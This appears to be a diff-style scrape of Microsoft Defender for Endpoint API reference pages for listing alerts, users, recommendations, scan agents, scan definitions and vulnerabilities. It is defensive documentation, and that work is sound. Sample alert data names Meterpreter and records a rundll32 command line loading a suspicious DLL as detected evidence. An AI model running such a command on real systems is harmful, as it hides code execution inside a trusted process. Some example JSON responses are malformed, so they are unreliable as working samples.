- "rbacGroupName": "The-A-Team",
- "riskScore": "Low",
- "exposureLevel": "Low",
- "aadDeviceId": "fd2e4d29-7072-4195-aaa5-1af139b78028",
- "machineTags": [
- "Tag1",
- "Tag2"
- ],
- "ipAddresses": [
- {
- "ipAddress": "10.166.113.47",
- "macAddress": "8CEC4B897E73",
- "operationalStatus": "Up"
- },
- {
- "ipAddress": "2a01:110:68:4:59e4:3916:3b3e:4f96",
- "macAddress": "8CEC4B897E73",
- "operationalStatus": "Up"
- }
- ]
-}
-```
security Get Alert Related User Info https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/api/get-alert-related-user-info.md
- Title: Get alert related user information
-description: Learn how to use the Get alert-related user information API to retrieve the user related to a specific alert in Microsoft Defender for Endpoint.
------- m365-security-- tier3-- must-keep--- Previously updated : 12/18/2020--
-# Get alert related user information API
--
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)--
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
---
-## API description
-
-Retrieves the User related to a specific alert.
-
-## Limitations
--- You can query on alerts last updated according to your configured retention period.-- Rate limitations for this API are 100 calls per minute and 1500 calls per hour.-
-## Permissions
-
-One of the following permissions is required to call this API. To learn more, including how to choose permissions, see [Use Microsoft Defender for Endpoint APIs](apis-intro.md)
-
-Permission type|Permission|Permission display name
-:|:|:
-Application|User.Read.All|'Read user profiles'
-Delegated (work or school account)|User.Read.All|'Read user profiles'
-
-> [!NOTE]
-> When obtaining a token using user credentials:
->
-> - The user needs to have at least the following role permission: 'View Data' (See [Create and manage roles](../user-roles.md) for more information)
-> - The user needs to have access to the device associated with the alert, based on device group settings (See [Create and manage device groups](../machine-groups.md) for more information)
->
-> Device group creation is supported in Defender for Endpoint Plan 1 and Plan 2.
-
-## HTTP request
-
-```http
-GET /api/alerts/{id}/user
-```
-
-## Request headers
-
-Name|Type|Description
-:|:|:
-Authorization|String|Bearer {token}. **Required**.
-
-## Request body
-
-Empty
-
-## Response
-
-If successful and alert and a user exists - 200 OK with user in the body. If alert or user not found - 404 Not Found.
-
-## Example
-
-### Request example
-
-Here's an example of the request.
-
-```http
-GET https://api.securitycenter.microsoft.com/api/alerts/636688558380765161_2136280442/user
-```
-
-### Response example
-
-Here is an example of the response.
-
-```json
-{
- "@odata.context": "https://api.securitycenter.microsoft.com/api/$metadata#Users/$entity",
- "id": "contoso\\user1",
- "accountName": "user1",
- "accountDomain": "contoso",
- "accountSid": "S-1-5-21-72051607-1745760036-109187956-93922",
- "firstSeen": "2019-12-08T06:33:39Z",
- "lastSeen": "2020-01-05T06:58:34Z",
- "mostPrevalentMachineId": "0111b647235c26159bec3e5eb6c8c3a0cc3ab766",
- "leastPrevalentMachineId": "0111b647235c26159bec3e5eb6c8c3a0cc3ab766",
- "logonTypes": "Network",
- "logOnMachinesCount": 1,
- "isDomainAdmin": false,
- "isOnlyNetworkUser": false
-}
-```
security Get Alerts https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/api/get-alerts.md
- Title: List alerts API
-description: Learn how to use the List alerts API to retrieve a collection of alerts in Microsoft Defender for Endpoint.
------- m365-security-- tier3-- must-keep--- Previously updated : 12/18/2020--
-# List alerts API
--
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
-----
-## API description
-
-Retrieves a collection of Alerts.
-
-Supports [OData V4 queries](https://www.odata.org/documentation/).
-
-OData supported operators:
--- ```$filter``` on: ```alertCreationTime```, ```lastUpdateTime```, ```incidentId```, ```InvestigationId```, ```id```, ```asssignedTo```, ```detectionSource```, ```lastEventTime```, ```status```, ```severity``` and ```category``` properties.-- ```$top``` with max value of 10,000 -- ```$skip```-- ```$expand``` of ```evidence```-- See examples at [OData queries with Microsoft Defender for Endpoint](exposed-apis-odata-samples.md).--
-## Limitations
-
-1. You can get alerts last updated according to your configured retention period.
-
-2. Maximum page size is 10,000.
-
-3. Rate limitations for this API are 100 calls per minute and 1,500 calls per hour.
--
-## Permissions
-
-One of the following permissions is required to call this API. To learn more, including how to choose permissions, see [Use Microsoft Defender for Endpoint APIs](apis-intro.md).
-
-|Permission type | Permission | Permission display name|
-|:|:|:|
-|Application | Alert.Read.All | `Read all alerts`|
-|Application | Alert.ReadWrite.All | `Read and write all alerts`|
-|Delegated (work or school account) | Alert.Read | `Read alerts`|
-|Delegated (work or school account) | Alert.ReadWrite | `Read and write alerts`|
-
-> [!NOTE]
-> When obtaining a token using user credentials:
->
-> - The user needs to have at least the following role permission: `View Data` (See [Create and manage roles](../user-roles.md) for more information)
-> - The response includes only alerts that are associated with devices that the user can access, based on device group settings (See [Create and manage device groups](../machine-groups.md) for more information)
->
-> Device group creation is supported in Defender for Endpoint Plan 1 and Plan 2.
-
-## HTTP request
-
-```http
-GET /api/alerts
-```
-
-## Request headers
-
-|Name|Type|Description|
-|:|:|:|
-|Authorization | String | Bearer {token}. **Required**.|
-
-## Request body
-
-Empty
-
-## Response
-
-If successful, this method returns 200 OK, and a list of [alert](alerts.md) objects in the response body.
-
-## Example 1 - Default
-
-### Request
-
-Here's an example of the request.
-
-```http
-GET https://api.securitycenter.microsoft.com/api/alerts
-```
-
-### Response
-
-Here's an example of the response.
-
-> [!NOTE]
-> The response list shown here may be truncated for brevity. All alerts will be returned from an actual call.
-
-```json
-{
- "@odata.context": "https://api.securitycenter.microsoft.com/api/$metadata#Alerts",
- "value": [
- {
- "id": "da637308392288907382_-880718168",
- "incidentId": 7587,
- "investigationId": 723156,
- "assignedTo": "secop123@contoso.com",
- "severity": "Low",
- "status": "New",
- "classification": "TruePositive",
- "determination": null,
- "investigationState": "Queued",
- "detectionSource": "WindowsDefenderAv",
- "category": "SuspiciousActivity",
- "threatFamilyName": "Meterpreter",
- "title": "Suspicious 'Meterpreter' behavior was detected",
- "description": "Malware and unwanted software are undesirable applications that perform annoying, disruptive, or harmful actions on affected machines. Some of these undesirable applications can replicate and spread from one machine to another. Others are able to receive commands from remote attackers and perform activities associated with cyber attacks.\n\nA malware is considered active if it is found running on the machine or it already has persistence mechanisms in place. Active malware detections are assigned higher severity ratings.\n\nBecause this malware was active, take precautionary measures and check for residual signs of infection.",
- "alertCreationTime": "2020-07-20T10:53:48.7657932Z",
- "firstEventTime": "2020-07-20T10:52:17.6654369Z",
- "lastEventTime": "2020-07-20T10:52:18.1362905Z",
- "lastUpdateTime": "2020-07-20T10:53:50.19Z",
- "resolvedTime": null,
- "machineId": "12ee6dd8c833c8a052ea231ec1b19adaf497b625",
- "computerDnsName": "temp123.middleeast.corp.microsoft.com",
- "rbacGroupName": "MiddleEast",
- "aadTenantId": "a839b112-1253-6432-9bf6-94542403f21c",
- "threatName": null,
- "mitreTechniques": [
- "T1064",
- "T1085",
- "T1220"
- ],
- "relatedUser": {
- "userName": "temp123",
- "domainName": "DOMAIN"
- },
- "comments": [
- {
- "comment": "test comment for docs",
- "createdBy": "secop123@contoso.com",
- "createdTime": "2020-07-21T01:00:37.8404534Z"
- }
- ],
- "evidence": []
- }
- ...
- ]
-}
-```
-
-## Example 2 - Get 10 latest Alerts with related Evidence
-
-### Request
-
-Here's an example of the request.
-
-```http
-GET https://api.securitycenter.microsoft.com/api/alerts?$top=10&$expand=evidence
-```
-
-### Response
-
-Here's an example of the response.
-
-> [!NOTE]
-> The response list shown here may be truncated for brevity. All alerts will be returned from an actual call.
-
-```json
-{
- "@odata.context": "https://api.securitycenter.microsoft.com/api/$metadata#Alerts",
- "value": [
- {
- "id": "da637472900382838869_1364969609",
- "incidentId": 1126093,
- "investigationId": null,
- "assignedTo": null,
- "severity": "Low",
- "status": "New",
- "classification": null,
- "determination": null,
- "investigationState": "Queued",
- "detectionSource": "WindowsDefenderAtp",
- "detectorId": "17e10bbc-3a68-474a-8aad-faef14d43952",
- "category": "Execution",
- "threatFamilyName": null,
- "title": "Low-reputation arbitrary code executed by signed executable",
- "description": "Binaries signed by Microsoft can be used to run low-reputation arbitrary code. This technique hides the execution of malicious code within a trusted process. As a result, the trusted process might exhibit suspicious behaviors, such as opening a listening port or connecting to a command-and-control (C&C) server.",
- "alertCreationTime": "2021-01-26T20:33:57.7220239Z",
- "firstEventTime": "2021-01-26T20:31:32.9562661Z",
- "lastEventTime": "2021-01-26T20:31:33.0577322Z",
- "lastUpdateTime": "2021-01-26T20:33:59.2Z",
- "resolvedTime": null,
- "machineId": "111e6dd8c833c8a052ea231ec1b19adaf497b625",
- "computerDnsName": "temp123.middleeast.corp.microsoft.com",
- "rbacGroupName": "A",
- "aadTenantId": "a839b112-1253-6432-9bf6-94542403f21c",
- "threatName": null,
- "mitreTechniques": [
- "T1064",
- "T1085",
- "T1220"
- ],
- "relatedUser": {
- "userName": "temp123",
- "domainName": "DOMAIN"
- },
- "comments": [
- {
- "comment": "test comment for docs",
- "createdBy": "secop123@contoso.com",
- "createdTime": "2021-01-26T01:00:37.8404534Z"
- }
- ],
- "evidence": [
- {
- "entityType": "User",
- "evidenceCreationTime": "2021-01-26T20:33:58.42Z",
- "sha1": null,
- "sha256": null,
- "fileName": null,
- "filePath": null,
- "processId": null,
- "processCommandLine": null,
- "processCreationTime": null,
- "parentProcessId": null,
- "parentProcessCreationTime": null,
- "parentProcessFileName": null,
- "parentProcessFilePath": null,
- "ipAddress": null,
- "url": null,
- "registryKey": null,
- "registryHive": null,
- "registryValueType": null,
- "registryValue": null,
- "accountName": "name",
- "domainName": "DOMAIN",
- "userSid": "S-1-5-21-11111607-1111760036-109187956-75141",
- "aadUserId": "11118379-2a59-1111-ac3c-a51eb4a3c627",
- "userPrincipalName": "temp123@microsoft.com",
- "detectionStatus": null
- },
- {
- "entityType": "Process",
- "evidenceCreationTime": "2021-01-26T20:33:58.6133333Z",
- "sha1": "ff836cfb1af40252bd2a2ea843032e99a5b262ed",
- "sha256": "a4752c71d81afd3d5865d24ddb11a6b0c615062fcc448d24050c2172d2cbccd6",
- "fileName": "rundll32.exe",
- "filePath": "C:\\Windows\\SysWOW64",
- "processId": 3276,
- "processCommandLine": "rundll32.exe c:\\temp\\suspicious.dll,RepeatAfterMe",
- "processCreationTime": "2021-01-26T20:31:32.9581596Z",
- "parentProcessId": 8420,
- "parentProcessCreationTime": "2021-01-26T20:31:32.9004163Z",
- "parentProcessFileName": "rundll32.exe",
- "parentProcessFilePath": "C:\\Windows\\System32",
- "ipAddress": null,
- "url": null,
- "registryKey": null,
- "registryHive": null,
- "registryValueType": null,
- "registryValue": null,
- "accountName": null,
- "domainName": null,
- "userSid": null,
- "aadUserId": null,
- "userPrincipalName": null,
- "detectionStatus": "Detected"
- },
- {
- "entityType": "File",
- "evidenceCreationTime": "2021-01-26T20:33:58.42Z",
- "sha1": "8563f95b2f8a284fc99da44500cd51a77c1ff36c",
- "sha256": "dc0ade0c95d6db98882bc8fa6707e64353cd6f7767ff48d6a81a6c2aef21c608",
- "fileName": "suspicious.dll",
- "filePath": "c:\\temp",
- "processId": null,
- "processCommandLine": null,
- "processCreationTime": null,
- "parentProcessId": null,
- "parentProcessCreationTime": null,
- "parentProcessFileName": null,
- "parentProcessFilePath": null,
- "ipAddress": null,
- "url": null,
- "registryKey": null,
- "registryHive": null,
- "registryValueType": null,
- "registryValue": null,
- "accountName": null,
- "domainName": null,
- "userSid": null,
- "aadUserId": null,
- "userPrincipalName": null,
- "detectionStatus": "Detected"
- }
- ]
- },
- ...
- ]
-}
-```
-
-## See also
-
-[OData queries with Microsoft Defender for Endpoint](exposed-apis-odata-samples.md)
-
security Get All Recommendations https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/api/get-all-recommendations.md
- Title: List all recommendations
-description: Retrieves a list of all security recommendations affecting the organization.
------- m365-security-- tier3-- must-keep--- Previously updated : 12/18/2020--
-# List all recommendations
--
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)--
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
----
-Retrieves a list of all security recommendations affecting the organization.
--
-## API description
-
-Returns information about all security recommendations affecting the organization.
-
-*URL:* GET:/api/recommendations
-<br>Supports [OData V4 queries](https://www.odata.org/documentation/).
-<br>OData supported operators:
-<br>```$filter``` on: ```id```, ```productName```, ```vendor```, ```recommendedVersion```, ```recommendationCategory```, ```subCategory```, ```severityScore```, ```remediationType```, ```recommendedProgram```, ```recommendedVendor```, and ```status``` properties.
-<br>```$top``` with max value of 10,000.
-<br>```$skip```.
-<br>See examples at [OData queries with Microsoft Defender for Endpoint](exposed-apis-odata-samples.md).
-
-## Permissions
-
-One of the following permissions is required to call this API. To learn more, including how to choose permissions, see [Use Microsoft Defender for Endpoint APIs](apis-intro.md) for details.
-
-Permission type|Permission|Permission display name
-:|:|:
-Application|SecurityRecommendation.Read.All|'Read Threat and Vulnerability Management security recommendation information'
-Delegated (work or school account)|SecurityRecommendation.Read |'Read Threat and Vulnerability Management security recommendation information'
-
-## HTTP request
-
-```http
-GET /api/recommendations
-```
-
-## Request headers
-
-Name|Type|Description
-:|:|:
-Authorization|String|Bearer {token}. **Required**.
-
-## Request body
-
-Empty
-
-## Response
-
-If successful, this method returns 200 OK with the list of security recommendations in the body.
-
-## Example
-
-### Request
-
-Here is an example of the request.
-
-```http
-GET https://api.securitycenter.microsoft.com/api/recommendations
-```
-
-### Response
-
-Here is an example of the response.
-
-```json
-{
- "@odata.context": "https://api.securitycenter.microsoft.com/api/$metadata#Recommendations",
- "value": [
- {
- "id": "va-_-microsoft-_-windows_10" "va-_-microsoft-_-windows_11",
- "productName": "windows_10" "Windows_11",
- "recommendationName": "Update Windows 10" "Update Windows 11",
- "weaknesses": 397,
- "vendor": "microsoft",
- "recommendedVersion": "",
- "recommendationCategory": "Application",
- "subCategory": "",
- "severityScore": 0,
- "publicExploit": true,
- "activeAlert": false,
- "associatedThreats": [
- "3098b8ef-23b1-46b3-aed4-499e1928f9ed",
- "40c189d5-0330-4654-a816-e48c2b7f9c4b",
- "4b0c9702-9b6c-4ca2-9d02-1556869f56f8",
- "e8fc2121-3cf3-4dd2-9ea0-87d7e1d2b29d",
- "94b6e94b-0c1d-4817-ac06-c3b8639be3ab"
- ],
- "remediationType": "Update",
- "status": "Active",
- "configScoreImpact": 0,
- "exposureImpact": 7.674418604651163,
- "totalMachineCount": 37,
- "exposedMachinesCount": 7,
- "nonProductivityImpactedAssets": 0,
- "relatedComponent": "Windows 10" "Windows 11"
- }
- ...
- ]
-}
-```
-
-## See also
--- [Microsoft Defender Vulnerability Management](/microsoft-365/security/defender-endpoint/next-gen-threat-and-vuln-mgt)-- [Vulnerability management security recommendations](/microsoft-365/security/defender-endpoint/tvm-security-recommendation)
security Get All Scan Agents https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/api/get-all-scan-agents.md
- Title: Get all scan agents
-description: Learn how to use the Get all scan agents API
------- m365-security-- tier3-- must-keep--- Previously updated : 12/14/2022--
-# Get all scan agents
--
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender Vulnerability Management](https://go.microsoft.com/fwlink/?linkid=2229011)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
-
-> Want to experience Microsoft Defender Vulnerability Management? Find out how to [sign up for a free trial](../../defender-vulnerability-management/get-defender-vulnerability-management.md).
----
-## API description
-
-Retrieves a list of all scan agents.
-
-## Limitations
-
-1. Rate limitations for this API are 100 calls per minute and 1500 calls per hour.
-
-## Permissions
-
-One of the following permissions is required to call this API. To learn more, including how to choose permissions, see [Use Microsoft Defender for Endpoint APIs](apis-intro.md).
-
-Permission type|Permission|Permission display name
-:|:|:
-Application|Machine.Read.All| Read all scan information.
-Delegated (work or school account)|Machine.Read.All|Read all scan information.
-
-> [!NOTE]
-> When obtaining a token using user credentials:
->
-> - To view data the user needs to have at least the following role permission: 'ViewData' or 'TvmViewData' (See [Create and manage roles](../user-roles.md) for more information)
-
-## HTTP request
-
-```http
-GET /api/DeviceAuthenticatedScanAgents
-```
-
-## Request headers
-
-Name|Type|Description
-:|:|:
-Authorization|String|Bearer {token}. **Required**.
-
-## Request body
-
-Empty
-
-## Response
-
-If successful, this method returns 200 - OK response code with a list of authenticated scan agents.
-
-## Example
-
-### Request example
-
-Here is an example of the request.
-
-```http
-https://api-us.securitycenter.microsoft.com/api/DeviceAuthenticatedScanAgents
-```
-
-### Response example
-
-Here is an example of the response.
-
-```json
-{
- "@odata.context": "https://api-us.securitycenter.microsoft.com/api/$metadata#DeviceAuthenticatedScanAgents",
- "value": [
- {
- "id": "47df41a0c-asad-4fd6d3-bbea-a93dbc0bfcaa_4edd75b2407a5b64d704b4e53d74f15",
- "machineId": "4ejh675b240118fbehiuiy5b64d704b4e53d15",
- "lastSeen": "2022-05-08T12:18:41.538203Z",
- "computerDnsName": "TEST_DOMAIN",
- "AssignedApplicationId": "9E0FA0EB-0A51-4357-9C87-C21BFBE07571",
- "ScannerSoftwareVersion": "7.1.1",
- "LastCommandExecutionTimestamp": "2022-05-08T12:18:41.538203Z",
- "mdeClientVersion": "10.8295.22621.1195"
- },
- {
- "id": "47d41a0c-1dfd-46d3-bbea-a93dbc0bfcaa_eb663a27ae9d032f61bc268oiu4c4b90f77",
- "machineId": "eb663a27ae9d032sdf9dfd79eedf14c4b90f77",
- "lastSeen": "2022-12-19T20:29:04.8242449Z",
- "computerDnsName": "TEST_DOMAIN2",
- "AssignedApplicationId": "9E0FA0EB-0A51-4357-9C87-C21BFBE07571",
- "ScannerSoftwareVersion": "7.1.1",
- "LastCommandExecutionTimestamp": "2022-12-19T20:29:04.8242449Z",
- "mdeClientVersion": "10.8295.22621.1010"
- },
- ]
-}
-```
security Get All Scan Definitions https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/api/get-all-scan-definitions.md
- Title: Get scan definitions
-description: Learn how to use the Get all scan definition APIs
------- m365-security-- tier3-- must-keep--- Previously updated : 12/14/2022--
-# Get scan definitions
--
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender Vulnerability Management](../../defender-vulnerability-management/index.yml)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
-
-> Want to experience Microsoft Defender Vulnerability Management? Find out how to [sign up for a free trial](../../defender-vulnerability-management/get-defender-vulnerability-management.md).
----
-## API description
-
-Retrieves a list of all scan definitions.
-
-## Limitations
-
-1. Rate limitations for this API are 100 calls per minute and 1500 calls per hour.
-
-## Permissions
-
-One of the following permissions is required to call this API. To learn more, including how to choose permissions, see [Use Microsoft Defender for Endpoint APIs](apis-intro.md).
-
-Permission type|Permission|Permission display name
-:|:|:
-Application|Machine.Read.All| Read all scan information.
-Delegated (work or school account)|Machine.Read.All|Read all scan information.
-
-> [!NOTE]
-> When obtaining a token using user credentials:
->
-> - To view data the user needs to have at least the following role permission: 'ViewData' or 'TvmViewData' (See [Create and manage roles](../user-roles.md) for more information)
-
-## HTTP request
-
-```http
-GET /api/DeviceAuthenticatedScanDefinitions
-```
-
-## Request headers
-
-Name|Type|Description
-:|:|:
-Authorization|String|Bearer {token}. **Required**.
-
-## Request body
-
-Empty
-
-## Response
-
-If successful, this method returns 200 - OK response code with a list of authenticated scan definitions.
-
-## Example
-
-### Request example
-
-Here is an example of the request.
-
-```http
-GET https://api.securitycenter.microsoft.com/api/DeviceAuthenticatedScanDefinitions
-```
-
-### Response example
-
-Here is an example of the response.
-
-```json
-{
-"@odata.context": "https://api.securitycenter.microsoft.com/api/$metadata#DeviceAuthenticatedScanDefinitions",
- "value": [
- {
- "id": "60c4vv57-asdf-3454-a456-2e45t9d79ec9d",
- "scanType": "Windows",
- "scanName": "Test Windows scan",
- "isActive": true,
- "target": "127.0.0.1",
- "orgId": "47d21a0c-cccd-45d3-bffa-a93dbc0bfcaa",
- "intervalInHours": 1,
- "createdBy": "test@contoso.com",
- "targetType": "Ip",
- "scanAuthenticationParams": {
- "@odata.type": "#microsoft.windowsDefenderATP.api.WindowsAuthParams",
- "type": "Kerberos",
- "username": "username",
- "domain": "password",
- "isGmsaUser": true
- },
- "scannerAgent": {
- "id": "47d41a0c-xxx-46d3-bbea-93dbc0bfcaa_1bc268a79eedf14c4b90f77",
- "machineId": "eb663asadf345dfg4bc268a79eedf14c4b90f77",
- "machineName": "DESKTOP-TEST",
- "lastSeen": "2021-12-19T20:29:04.8242449Z",
- "AssignedApplicationId": "9E0FA0EB-0A51-4357-9C87-C21BFBE07571",
- "ScannerSoftwareVersion": "7.1.1",
- "LastCommandExecutionTimestamp": "2021-12-19T20:29:04.8242449Z",
- "mdeClientVersion": "10.8295.22621.1195"
- },
- "latestScan": {
- "status": "Fail",
- "failureReason": null,
- "executionDateTime": "2021-12-19T20:06:55.2295854Z"
- },
- {
- "id": "60c4aa57-ioi3-1290-7ff6-09fr14792a92",
- "scanType": "Network",
- "scanName": "Network-test-scan",
- "isActive": true,
- "target": "127.0.0.1",
- "orgId": "asdf781a0c-792d-46d3-bbea-a93dbc0bfcaa",
- "intervalInHours": 1,
- "createdBy": "test@contoso.com",
- "targetType": "Ip",
- "scanAuthenticationParams": {
- "@odata.type": "#microsoft.windowsDefenderATP.api.SnmpAuthParams"",
- type": "AuthPriv",
- "username": "username",
- "authProtocol": "authProtocol",
- "authPassword": "authPassword",
- "privProtocol": "privProtocol",
- "privPassword": "privPassword",
- "communityString": "community-string"
- },
- "scannerAgent": {
- "id": "4asdff0c-3344-46d3-bxxe-a9334rtgfcaa_eb6df89dfdf9032f61eedf14c4b90f77",
- "machineId": "eb663a27676kjhj61bc268a79eedf14c4t78u7",
- "machineName": "DESKTOP-Test",
- "lastSeen": "2022-12-21T14:34:19.5698988Z",
- "AssignedApplicationId": "9E0FA0EB-0A51-4357-9C87-C21BFBE07571",
- "ScannerSoftwareVersion": "7.1.1",
- "LastCommandExecutionTimestamp": "2022-12-21T14:34:19.5698988Z",
- "mdeClientVersion": "10.8295.22621.1195"
- },
- "latestScan": {
- "status": "Fail",
- "failureReason": null,
- "executionDateTime": "2022-12-21T14:35:55.6702703Z"
- }
- },
- }
- ]
-}
-```
security Get All Vulnerabilities By Machines https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/api/get-all-vulnerabilities-by-machines.md
- Title: Get all vulnerabilities by machine and software
-description: Retrieves a list of all the vulnerabilities affecting the organization by Machine and Software
------- m365-security-- tier3-- must-keep--- Previously updated : 12/18/2020--
-# List vulnerabilities by machine and software
--
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
---
-Retrieves a list of all the vulnerabilities affecting the organization per [machine](machine.md) and [software](software.md).
--- If the vulnerability has a fixing KB, it will appear in the response.-- Supports [OData V4 queries](https://www.odata.org/documentation/).-- The OData's `$filter` query is supported on: `id`, `cveId`, `machineId`, `fixingKbId`, `productName`, `productVersion`, `severity`, and `productVendor` properties.
-<br>```$stop``` with max value of 10,000
-<br>```$skip```
-
-> [!TIP]
-> This is great API for [Power BI integration](api-power-bi.md).
-
-## Permissions
-
-One of the following permissions is required to call this API. To learn more, including how to choose permissions, see [Use Microsoft Defender for Endpoint APIs](apis-intro.md) for details.
-
-Permission type|Permission|Permission display name
-:|:|:
-Application|Vulnerability.Read.All|'Read Threat and Vulnerability Management vulnerability information'
-Delegated (work or school account)|Vulnerability.Read|'Read Threat and Vulnerability Management vulnerability information'
-
-## HTTP request
-
-```http
-GET /api/vulnerabilities/machinesVulnerabilities
-```
-
-## Request headers
-
-Name|Type|Description
-:|:|:
-Authorization|String|Bearer {token}. **Required**.
-
-## Request body
-
-Empty
-
-## Response
-
-If successful, this method returns 200 OK with the list of vulnerabilities in the body.
-
-## Example
-
-### Request example
-
-Here is an example of the request.
-
-```http
-GET https://api.securitycenter.microsoft.com/api/vulnerabilities/machinesVulnerabilities
-```
-
-### Response example
-
-Here is an example of the response.
-
-```json
-{
- "@odata.context": "https://api.securitycenter.microsoft.com/api/$metadata#Collection(microsoft.windowsDefenderATP.api.PublicAssetVulnerabilityDto)",
- "value": [
- {
- "id": "5afa3afc92a7c63d4b70129e0a6f33f63a427e21-_-CVE-2020-6494-_-microsoft-_-edge_chromium-based-_-81.0.416.77-_-",
- "cveId": "CVE-2020-6494",
- "machineId": "5afa3afc92a7c63d4b70129e0a6f33f63a427e21",
- "fixingKbId": null,
- "productName": "edge_chromium-based",
- "productVendor": "microsoft",
- "productVersion": "81.0.416.77",
- "severity": "Low"
- },
- {
- "id": "7a704e17d1c2977c0e7b665fb18ae6e1fe7f3283-_-CVE-2016-3348-_-microsoft-_-windows_server_2012_r2-_-6.3.9600.19728-_-3185911",
- "cveId": "CVE-2016-3348",
- "machineId": "7a704e17d1c2977c0e7b665fb18ae6e1fe7f3283",
- "fixingKbId": "3185911",
- "productName": "windows_server_2012_r2",
- "productVendor": "microsoft",
- "productVersion": "6.3.9600.19728",
- "severity": "Low"
- },
- ...
- ]
-
-}
-```
-
-## See also
--- [Microsoft Defender Vulnerability Management](/microsoft-365/security/defender-endpoint/next-gen-threat-and-vuln-mgt)-- [Vulnerabilities in your organization](/microsoft-365/security/defender-endpoint/tvm-weaknesses)
security Get All Vulnerabilities https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/api/get-all-vulnerabilities.md
- Title: Get all vulnerabilities
-description: Retrieves a list of all the vulnerabilities affecting the organization
------- m365-security-- tier3-- must-keep--- Previously updated : 12/18/2020--
-# List vulnerabilities
--
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
----
-## API description
-
-Retrieves a list of all vulnerabilities.
-<br>Supports [OData V4 queries](https://www.odata.org/documentation/).
-<br>OData supported operators:
-<br>```$filter``` on: ```id```, ```name```, ```description```, ```cvssV3```, ```publishedOn```, ```severity```, and ```updatedOn``` properties.
-<br>```$top``` with max value of 8,000.
-<br>```$skip```.
-<br>See examples at [OData queries with Microsoft Defender for Endpoint](exposed-apis-odata-samples.md).
-
-## Permissions
-
-One of the following permissions is required to call this API. To learn more, including how to choose permissions, see [Use Microsoft Defender for Endpoint APIs](apis-intro.md) for details.
-
-Permission type|Permission|Permission display name
-:|:|:
-Application|Vulnerability.Read.All|'Read Threat and Vulnerability Management vulnerability information'
-Delegated (work or school account)|Vulnerability.Read|'Read Threat and Vulnerability Management vulnerability information'
-
-## HTTP request
-
-```http
-GET /api/vulnerabilities
-```
-
-## Request headers
-
-Name|Type|Description
-:|:|:
-Authorization|String|Bearer {token}. **Required**.
-
-## Request body
-
-Empty
-
-## Response
-
-If successful, this method returns 200 OK with the list of vulnerabilities in the body.
-
